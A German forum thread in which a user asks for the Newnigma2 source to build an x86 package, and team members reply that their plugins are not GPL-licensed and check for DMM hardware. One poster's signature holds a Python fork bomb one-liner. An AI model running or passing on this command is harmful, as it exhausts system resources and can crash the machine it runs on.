Newnigma2 x86

• Hallo,

weiss jemand wo man den Source von newnigma2 herbekommt damit man sich ein x86 Paket basteln kann?

Falls es ein x86 Paket gibt würde ich das natürlich auch nehmen ;)

KR,

Dalek
    • Dann fahre mal nach togo und klage den ein :rolleyes:
      Und wer behauptet das unsere Plugins GPL lizenziert sind ?

Den DMM source der unter GPL steht den kannst du dir bei DMM besorgen.
      Wir verändern daran nichts.
    • Original von dalek
      Ich bin ja jetzt nur ungern der Spielverderber, aber wenn jemand den Source haben möchte, müsst Ihr den auch rausgeben. Von wegen GPL und so ...

cu

Ahja :D
      Und der Pabst ist evangelisch
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von dalek
      Ich bin ja jetzt nur ungern der Spielverderber, aber wenn jemand den Source haben möchte, müsst Ihr den auch rausgeben. Von wegen GPL und so ...

cu

Du Klugscheisser, das gilt für den veränderten/weiterentwickelten Stockcode...ich sehe hier keine abgeleiteten Programme, du?

Original von kati910
      Original von dalek

cu

Ahja :D
      Und der Pabst ist evangelisch

Ey ja, ich bin's aber =) :P =)
      "Wer ins Wasser sieht, sieht den Himmel auf Erden"
    • Original von dalek

cu

WO steht bei unseren Erweiterungen etwas von GPL? Die Teile des originalen Image, die tatsaechlich unter GPL stehen, kannst Du dir gerne bei Dream holen gehen, alle Newnigma² Erweiterungen aber nicht.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Wir prüfen beim Start unserer Plugins ob diese auf DMM Hardware laufen, da du das TPM Modul wohl nicht emulieren kannst wird eh der Großteil unserer Plugins nicht auf x86 Hardware laufen.
      Ohne Anpassungen wirst du den Großteil unserer Plugins eh nicht verwenden können, der Devicemanager hat zb. Box spezifische Sachen eingebaut.
      Was benötigtst du auf einem x86 System denn überhaupt aus dem Newnigma2 Part?